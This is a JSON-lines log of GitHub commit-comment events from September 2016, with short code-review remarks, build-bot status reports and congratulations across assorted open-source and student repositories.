{"id":"4544554682","type":"CommitCommentEvent","actor":{"login":"jzuken"},"repo":{"name":"baydindima/JavaCourse"},"payload":{"comment":{"id":18974738,"position":19,"line":19,"path":"src/main/java/homework1/LockFreeLazy.java","commit_id":"2fcda69d732d8bec89a403f35e2517fa85f5106d","created_at":"2016-09-10T19:14:20Z","updated_at":"2016-09-10T19:14:20Z","body":"а почему его нельзя сделать типа T?"}},"created_at":"2016-09-10T19:14:20Z"}
{"id":"4544555213","type":"CommitCommentEvent","actor":{"login":"Kadaj0"},"repo":{"name":"Kadaj0/test_text"},"payload":{"comment":{"id":18974740,"position":3,"line":1,"path":"file.txt","commit_id":"6c3ecfac398e99ed5c4582ee68b0c3b0820a5669","created_at":"2016-09-10T19:14:39Z","updated_at":"2016-09-10T19:14:39Z","body":"You are dumb"}},"created_at":"2016-09-10T19:14:39Z"}
{"id":"4544556332","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"RomanMuzhikyan/MusicApp"},"payload":{"comment":{"id":18974742,"position":28,"line":28,"path":"src/am/aca/musicapp/repository/implementation/AlbumRepositoryImlementation.java","commit_id":"2d4b5d718bcda7c369f6f6185065c0d08dfb0da1","created_at":"2016-09-10T19:15:20Z","updated_at":"2016-09-10T19:15:20Z","body":"delete method doesn't need to return object. it should be return void.\r\ne.g. \r\npublic void deleteAlbum(int id) throws InvalidCommandException;"}},"created_at":"2016-09-10T19:15:20Z"}
{"id":"4544556433","type":"CommitCommentEvent","actor":{"login":"TheLazyOtter"},"repo":{"name":"TheLazyOtter/ExampleA"},"payload":{"comment":{"id":18974743,"position":null,"line":null,"path":null,"commit_id":"0fb55f71f88d9ff4cac1361e9791bff86cd89696","created_at":"2016-09-10T19:15:24Z","updated_at":"2016-09-10T19:15:24Z","body":"Boobs"}},"created_at":"2016-09-10T19:15:24Z"}
{"id":"4544557313","type":"CommitCommentEvent","actor":{"login":"ArsenShnurkov"},"repo":{"name":"Maximus5/conemu-inside"},"payload":{"comment":{"id":18974744,"position":4,"line":20,"path":"ConEmuWinForms/Util/CommandLineBuilder.cs","commit_id":"857eb7c45f0ded41eab214faa36d13fe7c9960d2","created_at":"2016-09-10T19:16:06Z","updated_at":"2016-09-10T19:16:06Z","body":"Did you created corresponding issue in GitExtensions? What is it number?"}},"created_at":"2016-09-10T19:16:06Z"}
{"id":"4544558126","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974745,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T19:16:41Z","updated_at":"2016-09-10T19:16:41Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2334 of 2334 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T19:16:41Z"}
{"id":"4544558253","type":"CommitCommentEvent","actor":{"login":"BitcoinBelieverxxx"},"repo":{"name":"mycelium-com/wallet"},"payload":{"comment":{"id":18974746,"position":125,"line":160,"path":"public/mbw/src/main/java/com/mycelium/wallet/activity/export/DecryptPrivateKeyActivity.java","commit_id":"285ce55290ee7f1de19f68df150002c8ca71d134","created_at":"2016-09-10T19:16:47Z","updated_at":"2016-09-10T19:16:47Z","body":"updatePasswordText"}},"created_at":"2016-09-10T19:16:47Z"}
{"id":"4544558827","type":"CommitCommentEvent","actor":{"login":"rottegift"},"repo":{"name":"openzfsonosx/spl"},"payload":{"comment":{"id":18974747,"position":null,"line":null,"path":null,"commit_id":"6c22600ab70187ddf6d070d6bc9fc18084e031c0","created_at":"2016-09-10T19:17:12Z","updated_at":"2016-09-10T19:17:12Z","body":"Also, just occurred to me that you are not giving the memory back to the OS, but as far as vmem is concerned, it's *gone* (the imported span has been destroyed), and there is no real way of getting it back.\r\n\r\nWhat you could try is making a really really huge value for an underlying VM_NO_QCACHE pool, say several GiB, and put that under the heap; that will get held on to as long as a child vmem has sent non-freed vmem_[x]allocs down into it."}},"created_at":"2016-09-10T19:17:12Z"}
{"id":"4544562681","type":"CommitCommentEvent","actor":{"login":"orlando26"},"repo":{"name":"orlando26/effective-potato"},"payload":{"comment":{"id":18974753,"position":null,"line":null,"path":null,"commit_id":"126822858243dd45e9403f8d13d07292ada7ed3e","created_at":"2016-09-10T19:19:46Z","updated_at":"2016-09-10T19:19:46Z","body":":B "}},"created_at":"2016-09-10T19:19:46Z"}
{"id":"4544563755","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/IRAN12"},"payload":{"comment":{"id":18974754,"position":4,"line":275,"path":"bot/beyondbot.lua","commit_id":"de475622e2f5c03e56f2657f9fa7bbec2c2a8949","created_at":"2016-09-10T19:20:23Z","updated_at":"2016-09-10T19:20:23Z","body":"190409149"}},"created_at":"2016-09-10T19:20:23Z"}
{"id":"4544563992","type":"CommitCommentEvent","actor":{"login":"cstrahan"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18974755,"position":7,"line":186,"path":"nixos/lib/testing.nix","commit_id":"4dcb685af940efd74a7b2b66ae917129ef232d83","created_at":"2016-09-10T19:20:28Z","updated_at":"2016-09-10T19:20:28Z","body":"If we want `xchg` to *not* be exported, it looks like we'll either need to play games prior to invoking `export`, or perhaps the easiest solution, use a nix attr (e.g. `let xchg = \"xchg=vm-state-client/xchg\" in writeText ''... ${xchg} ...''`"}},"created_at":"2016-09-10T19:20:28Z"}
{"id":"4544565663","type":"CommitCommentEvent","actor":{"login":"Ali0012"},"repo":{"name":"Ali0012/IRAN12"},"payload":{"comment":{"id":18974756,"position":5,"line":275,"path":"bot/beyondbot.lua","commit_id":"de475622e2f5c03e56f2657f9fa7bbec2c2a8949","created_at":"2016-09-10T19:21:34Z","updated_at":"2016-09-10T19:21:34Z","body":"190409149"}},"created_at":"2016-09-10T19:21:34Z"}
{"id":"4544566513","type":"CommitCommentEvent","actor":{"login":"Laurensly"},"repo":{"name":"Laurensly/cafecoastalcatering.com"},"payload":{"comment":{"id":18974757,"position":1,"line":1,"path":"CNAME","commit_id":"aaa2e090a72ba5efde59186240f359158a2e7fde","created_at":"2016-09-10T19:22:11Z","updated_at":"2016-09-10T19:22:11Z","body":"cafecoastalcatering.com"}},"created_at":"2016-09-10T19:22:11Z"}
{"id":"4544570904","type":"CommitCommentEvent","actor":{"login":"tachi0327"},"repo":{"name":"tachi0327/catchup"},"payload":{"comment":{"id":18974758,"position":126,"line":126,"path":"catchup/catchup/settings.py","commit_id":"254c86726f66324c0a3cdef500887984e1ee8743","created_at":"2016-09-10T19:25:22Z","updated_at":"2016-09-10T19:25:22Z","body":"SITE_ROOT = '/var/www/catchup/static/'"}},"created_at":"2016-09-10T19:25:22Z"}
{"id":"4544572869","type":"CommitCommentEvent","actor":{"login":"tachi0327"},"repo":{"name":"tachi0327/catchup"},"payload":{"comment":{"id":18974761,"position":126,"line":126,"path":"catchup/catchup/settings.py","commit_id":"254c86726f66324c0a3cdef500887984e1ee8743","created_at":"2016-09-10T19:26:54Z","updated_at":"2016-09-10T19:26:54Z","body":"SITE_ROOT追記"}},"created_at":"2016-09-10T19:26:54Z"}
{"id":"4544572875","type":"CommitCommentEvent","actor":{"login":"vijaybarai"},"repo":{"name":"vijaybarai/Assignment-Programming-Assignment-2-Lexical-Scoping"},"payload":{"comment":{"id":18974762,"position":null,"line":null,"path":null,"commit_id":"fc06c335908d90b1461ca03da7485a72490a65c6","created_at":"2016-09-10T19:26:54Z","updated_at":"2016-09-10T19:26:54Z","body":"Matrix inversion is usually a costly computation and there may be some benefit to caching the inverse of a matrix rather than compute it repeatedly (there are also alternatives to matrix inversion that we will not discuss here). My assignment is to write a pair of functions that cache the inverse of a matrix."}},"created_at":"2016-09-10T19:26:54Z"}
{"id":"4544573797","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18974763,"position":138,"line":198,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-10T19:27:38Z","updated_at":"2016-09-10T19:27:38Z","body":"remove this line."}},"created_at":"2016-09-10T19:27:38Z"}
{"id":"4544574354","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18974764,"position":114,"line":149,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-10T19:28:02Z","updated_at":"2016-09-10T19:28:02Z","body":"Please remove comments if not required"}},"created_at":"2016-09-10T19:28:02Z"}
{"id":"4544579363","type":"CommitCommentEvent","actor":{"login":"bdbabiak"},"repo":{"name":"jonthysell/Mzinga"},"payload":{"comment":{"id":18974769,"position":null,"line":null,"path":null,"commit_id":"45775367f0c4ff061e6b163fff1dd3cb9393333e","created_at":"2016-09-10T19:31:38Z","updated_at":"2016-09-10T19:31:38Z","body":"I wanted to let you know that I've examined every Hive AI out there, at least 30 or 40. The strongest one, which can challenge masters on BGA, is written in C, searches 16 ply deep on multiple threads with a very simple board evaluation heuristic: 1) total mobility, 2) incremental queen surroundedness - 1, and 3) beetle covering queen. That's it. He assigned subjective, arbitrary, integer parameter weights to the above. I think you are wasting calculating power. Like chess, the solution is simplicity and depth of calculation. "}},"created_at":"2016-09-10T19:31:38Z"}
{"id":"4544579806","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18974770,"position":110,"line":145,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-10T19:31:54Z","updated_at":"2016-09-10T19:31:54Z","body":"Basically you have to first join list_pics and convert it into a string.\r\n\r\npics_str = ','.join(list_pics)\r\nrow[\"listing_gallery\"] = pics_str + row[\"listing_gallery\"]"}},"created_at":"2016-09-10T19:31:54Z"}
{"id":"4544581524","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18974772,"position":31,"line":40,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-10T19:33:08Z","updated_at":"2016-09-10T19:33:08Z","body":"Please remove this line"}},"created_at":"2016-09-10T19:33:08Z"}
{"id":"4544583524","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18974774,"position":59,"line":104,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-10T19:34:30Z","updated_at":"2016-09-10T19:34:30Z","body":"Change code to \"Successfully fetched geocodes of ....blah blah\""}},"created_at":"2016-09-10T19:34:30Z"}
{"id":"4544588394","type":"CommitCommentEvent","actor":{"login":"Atcold"},"repo":{"name":"Atcold/torch-TripletEmbedding"},"payload":{"comment":{"id":18974779,"position":29,"line":34,"path":"TripletEmbedding.lua","commit_id":"742599ce761b2d6cf128068b8f6fd327ad633a31","created_at":"2016-09-10T19:37:49Z","updated_at":"2016-09-10T19:37:49Z","body":"Hi @Minione, regardless of the dimensionality of `self.Li`, i.e. `N`, `N x 1` or `1 x N`, your suggestion is valid.\r\nI'm pushing now the edit and give you credit. Thank you."}},"created_at":"2016-09-10T19:37:49Z"}
{"id":"4544588716","type":"CommitCommentEvent","actor":{"login":"Equoda"},"repo":{"name":"LibreCAD/LibreCAD"},"payload":{"comment":{"id":18974780,"position":null,"line":null,"path":null,"commit_id":"41a0ca515734724aa931a585bb7c98bba9194af4","created_at":"2016-09-10T19:38:03Z","updated_at":"2016-09-10T19:38:03Z","body":"Yes, my fault. I have written this while being sleepy. It should be included in curly brackets. Thank you for your notice."}},"created_at":"2016-09-10T19:38:03Z"}
{"id":"4544591419","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":18974782,"position":null,"line":null,"path":null,"commit_id":"c6cf109ef9fabfc88cd363869c6f5a936524d90d","created_at":"2016-09-10T19:39:50Z","updated_at":"2016-09-10T19:39:50Z","body":"So this is an error, and you'll fix it?"}},"created_at":"2016-09-10T19:39:50Z"}
{"id":"4544592343","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":18974784,"position":110,"line":145,"path":"geocodertest.py","commit_id":"295e067d6272d80d358d9581b58508f799e5c7c3","created_at":"2016-09-10T19:40:27Z","updated_at":"2016-09-10T19:40:27Z","body":"Just confirmed, listing_gallery is created from update.py.\r\n\r\nIf you check main.py, this file is called before listing_gallery is created. So the best solution is to use \"Images URL\" in place of \"listing_gallery\"."}},"created_at":"2016-09-10T19:40:27Z"}
{"id":"4544592712","type":"CommitCommentEvent","actor":{"login":"greeninja"},"repo":{"name":"greeninja/fictional-computing-machine"},"payload":{"comment":{"id":18974785,"position":null,"line":null,"path":null,"commit_id":"7ffdb234dd9f58ef9b2026612c4799f9aef30d71","created_at":"2016-09-10T19:40:40Z","updated_at":"2016-09-10T19:40:40Z","body":"@lilxamz - need to confirm with you that this is a requirement / something you want to happen."}},"created_at":"2016-09-10T19:40:40Z"}
{"id":"4544593684","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":18974786,"position":null,"line":null,"path":null,"commit_id":"86995ac11c3ce888166a70ec462c66019ec78a27","created_at":"2016-09-10T19:41:17Z","updated_at":"2016-09-10T19:41:17Z","body":"Still the same with **v0.7.0-rc1** unfortunately ..."}},"created_at":"2016-09-10T19:41:17Z"}
{"id":"4544594320","type":"CommitCommentEvent","actor":{"login":"jgoppert"},"repo":{"name":"PX4/sitl_gazebo"},"payload":{"comment":{"id":18974788,"position":null,"line":null,"path":null,"commit_id":"e929eb4af063800bb772466b5561bb5be12cd81e","created_at":"2016-09-10T19:41:44Z","updated_at":"2016-09-10T19:41:44Z","body":"This breaks all of my multiple vehicles setups., can we revert it?"}},"created_at":"2016-09-10T19:41:44Z"}
{"id":"4544596389","type":"CommitCommentEvent","actor":{"login":"vokimon"},"repo":{"name":"arthurdejong/python-stdnum"},"payload":{"comment":{"id":18974791,"position":null,"line":null,"path":null,"commit_id":"2c557a0c2e091487fcf9dfe00d3934208136501e","created_at":"2016-09-10T19:43:04Z","updated_at":"2016-09-10T19:43:04Z","body":"I understand that the due credit to Vicente Sancho makes the documentation too verbose. Technically is not authorship since I reimplemented it bu due credit is due credit. Please leave it at least as comment in the code not just as commit message. Thanks."}},"created_at":"2016-09-10T19:43:04Z"}
{"id":"4544597710","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18974795,"position":null,"line":null,"path":null,"commit_id":"a893c49b2d12958c632da18c6ff4f4f77880a9d7","created_at":"2016-09-10T19:43:54Z","updated_at":"2016-09-10T19:43:54Z","body":"#5853-Fancoil-cold/hot-water-control-failed-warnings (rraustad) - x86_64-MacOS-10.9-clang: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a893c49b2d12958c632da18c6ff4f4f77880a9d7-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T19:43:54Z"}
{"id":"4544597747","type":"CommitCommentEvent","actor":{"login":"RJDTWO"},"repo":{"name":"GalaticStryder/kernel_lge_msm8974"},"payload":{"comment":{"id":18974796,"position":null,"line":null,"path":null,"commit_id":"c0df7ea82ea66c23433bf8ca04ceeba7781c5d03","created_at":"2016-09-10T19:43:56Z","updated_at":"2016-09-10T19:43:56Z","body":"@neobuddy89 @GalacticStryder I've had Linux-CK forever on my workstation and on my laptop and I really enjoy BFS as a whole which is primarily why I'm trying to get it working on 3.4. I saw DerRomtester and DespairFactor had been using it for a whole thanks to bbedward and I thought it was time to jump on board too. I like how it handles work loads a lot, and believe that it should've made it into mainline Linux honestly. CFS just isn't efficient. I will have a look into deadline real quick and try my luck"}},"created_at":"2016-09-10T19:43:56Z"}
{"id":"4544597922","type":"CommitCommentEvent","actor":{"login":"jgoppert"},"repo":{"name":"PX4/sitl_gazebo"},"payload":{"comment":{"id":18974797,"position":null,"line":null,"path":null,"commit_id":"e929eb4af063800bb772466b5561bb5be12cd81e","created_at":"2016-09-10T19:44:04Z","updated_at":"2016-09-10T19:44:04Z","body":"Nevermind, think it is is elsewhere, going to use bisect."}},"created_at":"2016-09-10T19:44:04Z"}
{"id":"4544599707","type":"CommitCommentEvent","actor":{"login":"devcampfreelancer"},"repo":{"name":"devcampfreelancer/demo-for-video"},"payload":{"comment":{"id":18974804,"position":null,"line":null,"path":null,"commit_id":"9b05531b67e4e86d2fce0f497ccaa4ef07cc7268","created_at":"2016-09-10T19:45:16Z","updated_at":"2016-09-10T19:45:16Z","body":"## Change Request\r\n\r\nThis change was required to ensure version functionality.\r\n\r\n```ruby\r\ndef my_method\r\n  puts \"something else\"\r\nend\r\n```"}},"created_at":"2016-09-10T19:45:16Z"}
{"id":"4544600945","type":"CommitCommentEvent","actor":{"login":"ljh20k"},"repo":{"name":"ljh20k/Group5_ITC205_assignment2"},"payload":{"comment":{"id":18974806,"position":null,"line":null,"path":null,"commit_id":"4c48f30462b09ee3029a7430f201a51bee0c08b9","created_at":"2016-09-10T19:46:08Z","updated_at":"2016-09-10T19:46:08Z","body":"**Wrong Commit name**\r\n**Not CheckStyle but bug fixes**"}},"created_at":"2016-09-10T19:46:08Z"}
{"id":"4544601586","type":"CommitCommentEvent","actor":{"login":"ljh20k"},"repo":{"name":"ljh20k/Group5_ITC205_assignment2"},"payload":{"comment":{"id":18974807,"position":null,"line":null,"path":null,"commit_id":"a9f494cbe84e222d351f796afddcc3236b3fd778","created_at":"2016-09-10T19:46:29Z","updated_at":"2016-09-10T19:46:29Z","body":"**Wrong Commit name**\r\n**Not CheckStyle but bug fixes**"}},"created_at":"2016-09-10T19:46:29Z"}
{"id":"4544601860","type":"CommitCommentEvent","actor":{"login":"ljh20k"},"repo":{"name":"ljh20k/Group5_ITC205_assignment2"},"payload":{"comment":{"id":18974808,"position":null,"line":null,"path":null,"commit_id":"266bcb9804c8969df069229fcb1b6976a93bedfb","created_at":"2016-09-10T19:46:40Z","updated_at":"2016-09-10T19:46:40Z","body":"**Wrong Commit name**\r\n**Not CheckStyle but bug fixes**"}},"created_at":"2016-09-10T19:46:40Z"}
{"id":"4544602705","type":"CommitCommentEvent","actor":{"login":"B3CKDOOR"},"repo":{"name":"B3CKDOOR/B3CKDOOR-BOT"},"payload":{"comment":{"id":18974809,"position":null,"line":null,"path":null,"commit_id":"1fb6406c54647bf4b441adfca7ef4ec9fd1afc1f","created_at":"2016-09-10T19:47:15Z","updated_at":"2016-09-10T19:47:15Z","body":"removed Bot_Settings.ini since it should auto generate..."}},"created_at":"2016-09-10T19:47:15Z"}
{"id":"4544603539","type":"CommitCommentEvent","actor":{"login":"MuhammedHasan"},"repo":{"name":"MuhammedHasan/metabol"},"payload":{"comment":{"id":18974810,"position":8,"line":15,"path":"src/search-engine/services/reaction/reaction.service.ts","commit_id":"0b1b81381817c901a37df16b1866c45e0e08bf7e","created_at":"2016-09-10T19:47:54Z","updated_at":"2016-09-10T19:47:54Z","body":"bu map satirini silmeyedin iyi di :D neyse ekledim."}},"created_at":"2016-09-10T19:47:54Z"}
{"id":"4544603778","type":"CommitCommentEvent","actor":{"login":"vokimon"},"repo":{"name":"arthurdejong/python-stdnum"},"payload":{"comment":{"id":18974811,"position":null,"line":null,"path":null,"commit_id":"251093268dfe1be05ecfc6c7c53a08577e77e930","created_at":"2016-09-10T19:48:05Z","updated_at":"2016-09-10T19:48:05Z","body":"Cool :-)"}},"created_at":"2016-09-10T19:48:05Z"}
{"id":"4544604666","type":"CommitCommentEvent","actor":{"login":"MuhammedHasan"},"repo":{"name":"MuhammedHasan/metabol"},"payload":{"comment":{"id":18974814,"position":null,"line":null,"path":null,"commit_id":"e5ee888d07cc26ada669bbcc6bb3c81272e0eec7","created_at":"2016-09-10T19:48:42Z","updated_at":"2016-09-10T19:48:42Z","body":"Helal olsun."}},"created_at":"2016-09-10T19:48:42Z"}
{"id":"4544609595","type":"CommitCommentEvent","actor":{"login":"wakaber"},"repo":{"name":"PureNexusProject/android_frameworks_base"},"payload":{"comment":{"id":18974817,"position":null,"line":null,"path":null,"commit_id":"f6e19f26cb386d70480510d293481018fd9b1859","created_at":"2016-09-10T19:52:09Z","updated_at":"2016-09-10T19:52:09Z","body":"Cool value."}},"created_at":"2016-09-10T19:52:09Z"}
{"id":"4544611820","type":"CommitCommentEvent","actor":{"login":"arco"},"repo":{"name":"msm7x30/android_hardware_qcom_display"},"payload":{"comment":{"id":18974822,"position":null,"line":null,"path":null,"commit_id":"beb3d408ff05d9748a8499f789941c7bde3b513a","created_at":"2016-09-10T19:53:42Z","updated_at":"2016-09-10T19:53:42Z","body":"Why you break 3.4 support? :p"}},"created_at":"2016-09-10T19:53:42Z"}
{"id":"4544613020","type":"CommitCommentEvent","actor":{"login":"GeorgyPorgy"},"repo":{"name":"fenugrec/oj2534-fw"},"payload":{"comment":{"id":18974826,"position":null,"line":null,"path":null,"commit_id":"5337fceade21379969be07fd458d84e96f21926d","created_at":"2016-09-10T19:54:40Z","updated_at":"2016-09-10T19:54:40Z","body":"Hello Roland,\n\nSorry for delay ...\n\nI'm not completely familiar with OJ2534-fw project, but in the opinion of\nthe contributor, state is uncompleted.\n\nMy interest was the realization of the driver, but its code is still\nmissing ...\n\nAnyway ... look this cheap device which offers features you are looking for\n\nhttp://shop.chipsoft.com.ua/index.php?route=product/product&product_id=117\n\n\nBest Regards\n\nGeorgi\n\n\n\n\n\n\n\n2016-09-07 6:26 GMT+03:00 Roland Harrison <notifications@github.com>:\n\n> Couldn't find a contact for you anywhere so posting on here. How complete\n> is the OJ2534-fw project. Does it support SetProgrammingVoltage with the\n> evaluation board currently? I'm interested in contributing to the project\n> as I'm looking for an open source firmware project that will allow me to\n> flash various PCMs, the ones I'm interested in require raising the voltage\n> of a pin to 12v during the flash process and this project looks as though\n> it would be a good fit.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/fenugrec/oj2534-fw/commit/5337fceade21379969be07fd458d84e96f21926d#commitcomment-18922572>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMLqGOirjoIl6UVj9EtMh7SGRuNc6grdks5qni7XgaJpZM4J2f5v>\n> .\n>\n"}},"created_at":"2016-09-10T19:54:40Z"}
{"id":"4544613101","type":"CommitCommentEvent","actor":{"login":"MiltonIvan"},"repo":{"name":"MiltonIvan/datasciencecoursera"},"payload":{"comment":{"id":18974827,"position":null,"line":null,"path":null,"commit_id":"f3aafae43f8072ec5cd66aeed1417a808b2bc3fb","created_at":"2016-09-10T19:54:43Z","updated_at":"2016-09-10T19:54:43Z","body":"## This is a Markdown file"}},"created_at":"2016-09-10T19:54:43Z"}
{"id":"4544614736","type":"CommitCommentEvent","actor":{"login":"keshavbhatt"},"repo":{"name":"keshavbhatt/snapcraft-gui"},"payload":{"comment":{"id":18974829,"position":null,"line":null,"path":null,"commit_id":"0ef00182964f4fb5c0c1712a387f7cfc72a1092b","created_at":"2016-09-10T19:55:54Z","updated_at":"2016-09-10T19:55:54Z","body":":+1:  :100: "}},"created_at":"2016-09-10T19:55:54Z"}
{"id":"4544615581","type":"CommitCommentEvent","actor":{"login":"ijspizza"},"repo":{"name":"MitchZinck/SkypeDestroyer"},"payload":{"comment":{"id":18974831,"position":null,"line":null,"path":null,"commit_id":"36629be40adcc580ee99b709e00337413a646f51","created_at":"2016-09-10T19:56:33Z","updated_at":"2016-09-10T19:56:33Z","body":"yea it doesn't work anymore that sucks"}},"created_at":"2016-09-10T19:56:33Z"}
{"id":"4544615736","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18974833,"position":null,"line":null,"path":null,"commit_id":"277a096add6b74ff533425f005f183dc6b2839a8","created_at":"2016-09-10T19:56:40Z","updated_at":"2016-09-10T19:56:40Z","body":"So, I used `dbg_mean_of(ei.pi->pawn_islands(Them));` for each queen being evaluated and run a default bench. First (odd) results:\r\nFor `ei.me->game_phase() >= PHASE_MIDGAME`:\r\nTotal 326181 Mean 0.933914\r\nFor `ei.me->game_phase() < PHASE_MIDGAME`:\r\nTotal 3330734 Mean 1.7035"}},"created_at":"2016-09-10T19:56:40Z"}
{"id":"4544616191","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974834,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T19:57:01Z","updated_at":"2016-09-10T19:57:01Z","body":"Congrats!"}},"created_at":"2016-09-10T19:57:01Z"}
{"id":"4544616739","type":"CommitCommentEvent","actor":{"login":"nabildanial"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974835,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T19:57:25Z","updated_at":"2016-09-10T19:57:25Z","body":"Congrats!! "}},"created_at":"2016-09-10T19:57:25Z"}
{"id":"4544616904","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18974836,"position":null,"line":null,"path":null,"commit_id":"ff9cd5781b18a573449e42be2db6083690237d49","created_at":"2016-09-10T19:57:32Z","updated_at":"2016-09-10T19:57:32Z","body":"Yep, that is good thank you"}},"created_at":"2016-09-10T19:57:32Z"}
{"id":"4544617227","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974837,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T19:57:46Z","updated_at":"2016-09-10T19:57:46Z","body":"Nice patch. Congrats!"}},"created_at":"2016-09-10T19:57:46Z"}
{"id":"4544618105","type":"CommitCommentEvent","actor":{"login":"durner"},"repo":{"name":"hschmidtchen/hschmidtchen.github.io"},"payload":{"comment":{"id":18974841,"position":null,"line":null,"path":null,"commit_id":"d9a779fe5a70c87b223ef0f7f8fc166764b5b073","created_at":"2016-09-10T19:58:22Z","updated_at":"2016-09-10T19:58:22Z","body":"Nice one!"}},"created_at":"2016-09-10T19:58:22Z"}
{"id":"4544618342","type":"CommitCommentEvent","actor":{"login":"bdbabiak"},"repo":{"name":"jonthysell/Mzinga"},"payload":{"comment":{"id":18974843,"position":null,"line":null,"path":null,"commit_id":"45775367f0c4ff061e6b163fff1dd3cb9393333e","created_at":"2016-09-10T19:58:31Z","updated_at":"2016-09-10T19:58:31Z","body":"What's really interesting is how this brute force approach intuitive arrives at many human strategies like pinning, making gates around the queen, etc. Basically, intelligence is using symbols to pack a large number of calculations or practical experience into a single unit, a concept. As such, AI is a misnomer, since computers aren't intelligent and don't have concepts. Rather, they mimic intelligence by \"unpacking\" those calculations tucked into the human strategic concepts. This other program using lots often pre-optimized c routines for blitzkrieg calculations. There is great attention to speed and calculation order and efficiency, and almost none given to strategy, except the bluntest goals of the game, to kill the queen and immobilize her and her defense."}},"created_at":"2016-09-10T19:58:31Z"}
{"id":"4544619602","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974845,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T19:59:25Z","updated_at":"2016-09-10T19:59:25Z","body":"Congrats too!"}},"created_at":"2016-09-10T19:59:25Z"}
{"id":"4544619692","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18974846,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T19:59:28Z","updated_at":"2016-09-10T19:59:28Z","body":"Congrats!"}},"created_at":"2016-09-10T19:59:28Z"}
{"id":"4544619798","type":"CommitCommentEvent","actor":{"login":"chriship"},"repo":{"name":"mpociot/teamwork"},"payload":{"comment":{"id":18974847,"position":null,"line":null,"path":null,"commit_id":"783f0bfdd6f2d79acb0e37a77f16a5767d3b91fa","created_at":"2016-09-10T19:59:34Z","updated_at":"2016-09-10T19:59:34Z","body":"Hi,\r\nJust wondering why you decided to stop this migration being copied over to the migrations folder?"}},"created_at":"2016-09-10T19:59:34Z"}
